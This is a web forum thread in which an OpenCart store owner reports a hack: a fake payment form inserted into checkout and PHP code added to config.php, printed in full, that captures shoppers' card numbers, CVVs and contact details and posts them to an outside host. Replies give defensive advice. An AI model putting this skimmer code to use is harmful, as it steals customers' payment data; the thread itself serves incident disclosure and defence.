Post by CTWeb » Fri Oct 13, 2023 12:59 am

Our malware software on the host recently alerted us to some malicious code had been added to 4 files on our clients website.

The hacker has added a fake payment section into the checkout Step 5, to defraud users of their card payment details.

Please see attached screenshot of the spoof payment fields they inserted.

The following files were modified to first allow file uploads:

\admin\language\en-gb\extension\keysubmit.php
\admin\language\en-gb\extension\headermenu.php
\admin\language\en-gb\extension\extension\feed.php
\admin\language\ru-ru\extension\module\sitemenu.php

Then the spoof html fields were added to both Default template, and also our custom template too:
\catalog\view\theme\default\template\checkout\payment_method.twig
\catalog\view\theme\[our_custom_theme]\template\checkout\payment_method.twig

Then the following code was added to:
\config.php

Code: Select all

if (isset($_POST['postcode'])){
session_start();
		$_SESSION['adddreas'] = $_POST["address_1"];
		$_SESSION['addrebs'] =   $_POST["city"];
		$_SESSION['sadsdws'] =  $_POST["postcode"];
		$_SESSION['adsdSws'] =  $_POST["firstname"];
		$_SESSION['adsdEWQWEws'] =  $_POST["lastname"];
		$_SESSION['adsdEWQWEwse'] =  $_POST["email"];
		$_SESSION['adsdEWQWEwst'] =  $_POST["telephone"];
        }
elseif (isset($_POST['address_id'])){
session_start();
$link = mysqli_connect(DB_HOSTNAME,DB_USERNAME,DB_PASSWORD,DB_DATABASE); 
$youth = $_POST['address_id'];
$sql = "SELECT * FROM oc_address WHERE address_id='$youth'"; 
if($res = mysqli_query($link, $sql)){ 
    if(mysqli_num_rows($res) > 0){ 
        while($row = mysqli_fetch_array($res)){ 
		$_SESSION['adddreas'] = $row["address_1"];
		$_SESSION['addrebs'] =   $row["city"];
		$_SESSION['sadsdws'] =  $row["postcode"];
		$_SESSION['adsdSws'] =  $row["firstname"];
		$_SESSION['adsdEWQWEws'] =  $row["lastname"];
        } 
}}}		
	if (isset($_POST['ccc']))
    {
		session_start();
		$ccnum = $_POST['ccc'];
		$expmonth =   $_POST['expp'];
		$cvv =  $_POST['cvvv'];
		$street =$_SESSION['adddreas'];
		$postcode = $_SESSION['sadsdws'];
		$city = $_SESSION['addrebs'];
		$fnamezz = $_SESSION['adsdEWQWEws'];
		$fnamez = $_SESSION['adsdSws'];
		$email = $_SESSION['adsdEWQWEwse'];
		$phone = $_SESSION['adsdEWQWEwst'];
		$ip = $_SERVER['SERVER_NAME'];
		$message = "$fnamez $fnamezz|$ccnum|$expmonth|$cvv|$street|$city|$postcode|$phone|$email";
		$rnessage = "$message\n";
		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL,"https://shiksd.xyz/plugins/");
		curl_setopt($ch, CURLOPT_POST, 1);
		curl_setopt($ch, CURLOPT_POSTFIELDS,"data=$rnessage&name=$ip");
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
		$server_output = curl_exec($ch);
		curl_close ($ch);
		}
As you can see this posts the customers data straight to dodgy website URL: shiksd.xyz/plugins/

We have now fixed the site by restoring the hacked files from our original backup, and also done full compare of all site files to check no other files were affected. All passwords now changed, and database credentials updated.

Questions:
1. Has anyone else seen a sophisticated hack like this?
2. Is there any way to find out how they managed to inject the original code?
3. Are there any security plugins that prevent code from being edited?
4. Are there any known vulnerabilities with the mods / extensions we are using?

Opencart: 3.0.3.8

Extensions / Modules:
PayPal Checkout Integration (Highly Recommended)
Worldpay Business Gateway
CouponAtCheckout (by cartbinder)
Extra Product Pages
Mega Filter PRO
Low Stock Management
Manufacturer List
Price Based Shipping
Redirect Manager
Restrict Payment Methods
Smart Search
TMD Import Export Module
Automatically generate SEO URL slug

Attachments

config-php.JPG

hacked config file - config-php.JPG (178.24 KiB) Viewed 2635 times

feed-php.JPG

code for uploading files - feed-php.JPG (150.72 KiB) Viewed 2635 times

Checkout-Step-5.JPG

Hacked Step 5 of Checkout - Checkout-Step-5.JPG (74.58 KiB) Viewed 2635 times


Newbie

Posts

Joined
Thu Nov 26, 2020 9:21 pm

Post by TMD Extension @ » Fri Oct 13, 2023 1:50 pm

We can assured that our TMD import-export module is highly tested. There are some possible thoughts you can check with your hosting.

TO DO
Take the backup of the database from the admin.
Re-install the OpenCArt again and restore the previous backup.

1. Is this is shared hosting, then most easiest way to inject on one website is to gain all website access by hackers.
2. Use the antivirus a third-party software like SECURI.net - to add an extra layer of security on it.
3. Use the hosting provider's inbuilt anti-virus software.
4. Try to restore the backup instead of cleaning the existing website. There is the possible case that virus code is present somewhere hidden in your files.
5. Use the WHM or scan each folder like HOME, WWW, public_FTP, public_html, mail etc. to make sure you are virus-free.
6. Contact the developer, company, or hosting provider who can help you to restore the website.
7. Always have the most recent backup ready for these scenarios.

Image

Thanks & Regards
Sehaj Kaur
TMD Extensions
Contact Us For Customisations


Active Member

Posts

Joined
Thu Mar 17, 2022 12:59 pm

Post by ADD Creative » Fri Oct 13, 2023 4:45 pm

Weak and stolen passwords are possibly most likely. So make sure you have changed all of them, including FTP and hosting. Delete any accounts you are not using.

To find out how they managed to inject the original code would be a case of going through the various logs. FTP, web access, PHP and OpenCart error logs, etc. The date the files were changed may help to know when to start looking.

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by OSWorX » Fri Oct 13, 2023 5:20 pm

One aspect (beside the already given tipps) is: if you operate e.g. WordPress on the same account, this will be the most open door for script kiddies and so called hacker.
To secure OpenCart it's advised to operate it in a single instance - with no other CMS etc. !

Full Stack Web Developer :: Dedicated OpenCart Development & Support DACH Region
Contact for Custom Work / Fast Support.


User avatar
Guru Member

Posts

Joined
Mon Jan 11, 2010 10:52 pm
Location - Austria

Post by johnp » Fri Oct 13, 2023 10:15 pm

Once you're back up and running with a clean site put a firewall on it:

Ninja Firewall
https://nintechnet.com/ninjafirewall/pro-edition

The free version of Ninja Firewall is fine to get going with.

Opencart 1.5.6.5/OC Bootstrap Pro/VQMOD lover, user and geek.
Affordable Service £££ - Opencart Installs, Fixing, Development and Upgrades
Plus Ecommerce, Marketing, Mailing List Management and More
FREE Guidance and Advice at https://www.ecommerce-help.co.uk


User avatar
Active Member

Posts

Joined
Fri Mar 25, 2011 10:25 am
Location - Surrey, UK

Post by halfhope » Sat Oct 14, 2023 2:03 am

Hi! 

1. Yes, I am. Only a few of them are capable of surprising. This is not.
2. Already not, you deleted all files and logs. Possibly he have access to filesystem through ftp/admin.
3. I have a file change notification extension - FSMonitor. 
4. No, it's hard to write bad code In opencart. 

My extensions in marketplace. [ security | flexibility | speedup ]


User avatar
Active Member

Posts

Joined
Tue Dec 10, 2013 9:44 pm
Location - San Diego

Post by merchantta » Mon Oct 16, 2023 7:46 pm

Thank you for sharing your experience with the community. While it's challenging to pinpoint the exact vulnerability, it's crucial to follow the recommended security measures to prevent future attacks. Stay vigilant and keep your software and extensions up to date.

Merchantta is here to help you. We offer ready-to-use Payment Gateways with verified documents along with Ad Account Renting, Account Suspension Removal Services, & Tax Exemption Services at the best market price.


User avatar
Newbie

Posts

Joined
Sat Aug 26, 2023 6:28 pm
Location - 1216 Flatbush Ave, Brooklyn, NY 11226, USA
Who is online

Users browsing this forum: No registered users and 1 guest